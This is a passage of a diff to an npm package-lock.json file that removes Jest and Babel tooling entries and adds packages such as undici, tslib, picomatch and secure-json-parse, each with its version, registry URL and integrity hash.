"resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true + "license": "ISC" }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@opentelemetry/api": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", - "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==", - "license": "Apache-2.0", "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@swc/helpers": { - "version": "0.5.17", - "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", - "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", - "license": "Apache-2.0", - "dependencies": { - "tslib": "^2.8.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/command-line-args": { - "version": "5.2.3", - "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", - "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==", - "license": "MIT" - }, - "node_modules/@types/command-line-usage": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", - "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==", "license": "MIT" }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true + "node_modules/secure-json-parse": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", + "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fastify" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/fastify" + } + ], + "license": "BSD-3-Clause" }, - "node_modules/@types/istanbul-lib-report": { + "node_modules/slash": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.17.46", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", - "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", - "license": "MIT", - "dependencies": { - "undici-types": "~6.19.2" - } - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, "engines": { "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", "dev": true, + "dependencies": { + "escape-string-regexp": "^2.0.0" + }, "engines": { - "node": ">=8" + "node": ">=10" } }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", "dependencies": { - "color-convert": "^2.0.1" + "has-flag": "^4.0.0" }, "engines": { "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, + "node_modules/table-layout": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", + "integrity": "sha512-iK5/YhZxq5GO5z8wb0bY1317uDF3Zjpha0QFFLA8/trAoiLbQD0HUbMesEaxyzUgDxi2QlcbM8IvqOlEjgoXBA==", + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" + "array-back": "^6.2.2", + "wordwrapjs": "^5.1.0" }, "engines": { - "node": ">= 8" + "node": ">=12.17" } }, - "node_modules/apache-arrow": { - "version": "19.0.1", - "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", - "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", - "license": "Apache-2.0", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, + "license": "MIT", "dependencies": { - "@swc/helpers": "^0.5.11", - "@types/command-line-args": "^5.2.3", - "@types/command-line-usage": "^5.0.4", - "@types/node": "^20.13.0", - "command-line-args": "^6.0.1", - "command-line-usage": "^7.0.1", - "flatbuffers": "^24.3.25", - "json-bignum": "^0.0.3", - "tslib": "^2.6.2" + "is-number": "^7.0.0" }, - "bin": { - "arrow2csv": "bin/arrow2csv.js" + "engines": { + "node": ">=8.0" } }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } + "node_modules/tslib": { + "version": "2.8.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", + "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", + "license": "0BSD" }, - "node_modules/array-back": { - "version": "6.2.2", - "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", - "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==", + "node_modules/typical": { + "version": "7.3.0", + "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", + "integrity": "sha512-ya4mg/30vm+DOWfBg4YK3j2WD6TWtRkCbasOJr40CseYENzCUby/7rIvXA99JGsQHeNxLbnXdyLLxKSv3tauFw==", "license": "MIT", "engines": { "node": ">=12.17" } }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, + "node_modules/undici": { + "version": "6.21.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.21.3.tgz", + "integrity": "sha512-gBLkYIlEnSp8pFbT64yFgGE6UIB9tAkhukC23PmMDCe5Nd+cRqKxSjw5y54MK2AZMgZfJWMaNE4nYUHgi1XEOw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" + "node": ">=18.17" } }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001517", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001517.tgz", - "integrity": "sha512-Vdhm5S11DaFVLlyiKu4hiUTkpZu+y1KA/rZZqVQfOD5YdDT/eQKlkt7NaE0WGOFgX32diqt9MiP9CAiFeRklaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/chalk-template": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", - "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", - "license": "MIT", - "dependencies": { - "chalk": "^4.1.2" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/chalk-template?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": 